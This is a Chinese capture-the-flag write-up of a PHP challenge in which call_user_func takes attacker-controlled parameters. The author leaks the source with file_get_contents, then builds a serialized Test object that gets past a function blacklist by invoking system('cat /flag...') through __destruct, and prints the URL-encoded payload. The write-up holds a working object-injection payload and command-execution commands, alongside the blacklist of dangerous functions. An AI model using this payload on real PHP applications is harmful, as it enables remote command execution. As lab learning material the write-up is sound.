打开题目,发现页面一直刷新(每5秒)
使用bp拦截请求发现post了两条数据
一个是func,一个是p
猜测这个导致一直刷新
查询后发现,这里可能用到了一个函数
call_user_func(函数名,参数)
使用这个函数查看一下源码
func=file_get_contents&p=index.php
得到了
<?php$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");function gettime($func, $p) {
$result = call_user_func($func, $p);$a= gettype($result);if ($a == "string") {
return $result;} else {
return "";}}class Test {
var $p = "Y-m-d h:i:s a";var $func = "date";function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);}}}$func = $_REQUEST["func"];$p = $_REQUEST["p"];if ($func != null) {
$func = strtolower($func);if (!in_array($func,$disable_fun)) {
echo gettime($func, $p);}else {
die("Hacker...");}}?>
这里利用func和p传递内容
为了绕过黑名单,我们可以使用序列化外加url编码
<?phpfunction gettime($func, $p) {
$result = call_user_func($func, $p);$a= gettype($result);if ($a == "string") {
return $result;} else {
return "";}}class Test {
var $p = "Y-m-d h:i:s a";var $func = "date";function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);}}}$a=new Test();
$a->func="system";
//$a->p="ls";
//$a->="find / -name 'flag*'";
$a->p="cat /flag_280224173";echo(urlencode(serialize($a)));?>
payload:
O%3A4%3A%22Test%22%3A2%3A%7Bs%3A1%3A%22p%22%3Bs%3A19%3A%22cat+%2Fflag_280224173%22%3Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3B%7D
find用法:
find path -option [ -print ] [ -exec -ok command ] {} \;
path: .代表当前路径,/代表总目录
-name name, -iname name : 文件名称符合 name 的文件。iname 会忽略大小写
name可以使用通配符,如“flag.*”
Linux中find命令的作用
找到了一些文件
然后用cat命令直接获取到flag
